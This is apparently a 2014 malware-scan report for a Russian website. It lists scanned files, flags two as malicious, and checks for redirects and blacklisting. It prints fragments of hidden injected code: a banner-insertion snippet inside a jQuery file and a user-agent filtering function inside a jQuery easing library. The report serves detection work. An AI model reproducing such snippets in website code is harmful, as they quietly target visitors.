Scanned pages/files
Request | Server response | Status |
http://bstrana18.ru/ | 200 OK Content-Length: 31711 Content-Type: text/html | clean |
http://bstrana18.ru/media/system/js/caption.js | 200 OK Content-Length: 3655 Content-Type: application/javascript | clean |
http://bstrana18.ru/plugins/content/mavikthumbnails/slimbox/js/slimbox.js | 200 OK Content-Length: 8765 Content-Type: application/javascript | clean |
http://bstrana18.ru/modules/mod_vm_css_menu/js/vertical_flyout_right.js | 200 OK Content-Length: 2372 Content-Type: application/javascript | clean |
http://bstrana18.ru/templates/vsi39/script_20.js | 200 OK Content-Length: 16407 Content-Type: application/javascript | clean |
http://bstrana18.ru/scripts/nynyce.js | 200 OK Content-Length: 112063 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\ if (!mdom) { newDiv = document.createElement('p'); newDiv.innerHTML = "<div style='text-align:center; padding-top: 10px; padding-bottom: 10px; background-color:white' class='basic-modal' onclick='click_banner555();' style='cursor:hand'><img src='/sale.png' style='cursor:hand'></div>"; if (document.body.firstChild) { document.body.insertBefore(newDiv, document.body.firstChild); } else { document.body.appendChild(newDiv); } } } Antivirus reports:
| ||
http://bstrana18.ru/modules/mod_AutsonSlideShow/js/jquery-1.5.2.min.js | 200 OK Content-Length: 87617 Content-Type: application/javascript | clean |
http://bstrana18.ru/modules/mod_AutsonSlideShow/js/jquery.easing.1.3.js | 200 OK Content-Length: 9789 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackLine = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','AmigaOS','Android','FreeBSD','Chrome','IEMobile','SymbianOS' return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b; } else if (t < (2.5/2.75)) { return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b; } else { return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); Antivirus reports:
| ||
http://bstrana18.ru/modules/mod_AutsonSlideShow/js/jquery.animate-colors-min.js | 200 OK Content-Length: 3428 Content-Type: application/javascript | clean |
http://bstrana18.ru/modules/mod_AutsonSlideShow/js/jquery.skitter.min.js | 200 OK Content-Length: 51871 Content-Type: application/javascript | clean |
http://bstrana18.ru/prodazha.html | 200 OK Content-Length: 37715 Content-Type: text/html | clean |
http://bstrana18.ru/modules/mod_vm_css_menu/js/vertical_flyout_left.js | 200 OK Content-Length: 2372 Content-Type: application/javascript | clean |
http://bstrana18.ru/components/com_virtuemart/75758da.js | 200 OK Content-Length: 63119 Content-Type: application/javascript | clean |
http://bstrana18.ru/modules/mod_joomulus/swfobject.js | 200 OK Content-Length: 44887 Content-Type: application/javascript | clean |
http://bstrana18.ru/templates/vsi39_1/script.js | 200 OK Content-Length: 16407 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bstrana18.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 21 Jun 2014 12:50:08 GMT
Server: nginx/1.1.19
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.3.10-1ubuntu3.8
GET / HTTP/1.1
Host: bstrana18.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 21 Jun 2014 12:50:08 GMT
Server: nginx/1.1.19
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.3.10-1ubuntu3.8
Second query (visit from search engine):
GET / HTTP/1.1
Host: bstrana18.ru
Referer: http://www.google.com/search?q=bstrana18.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bstrana18.ru
Referer: http://www.google.com/search?q=bstrana18.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bstrana18.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bstrana18.ru/
Result: bstrana18.ru is not infected or malware details are not published yet.
Result: bstrana18.ru is not infected or malware details are not published yet.